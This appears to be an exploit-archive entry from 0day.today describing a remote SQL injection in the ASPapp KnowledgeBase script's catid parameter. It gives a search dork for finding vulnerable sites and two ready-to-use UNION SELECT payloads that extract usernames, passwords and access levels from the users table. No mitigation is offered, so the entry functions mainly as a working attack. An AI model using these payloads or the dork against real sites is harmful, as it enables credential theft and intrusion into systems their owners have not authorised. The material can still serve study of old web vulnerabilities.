id: 3774
date: 09/26/2008
title: ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability
author: Crackers_Child
cves: 

===============================================================
ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability
===============================================================


Dork -  content_by_cat.asp?contentid ''catid'' 

Exploit : 

content_by_cat.asp?contentid=99999999&catid=-99887766 UNION SELECT 0,null,password,3,accesslevel,5,null,7,null,user_name from users

Exploit 2 :

content_by_cat.asp?contentid=-99999999&catid=-99887766 union select 0,null,password,3,accesslevel,5,null,7,8,user_name from users

DownLoad Site : http://camyuva.bel.tr/who.php



#  0day.today [2023-03-22]  #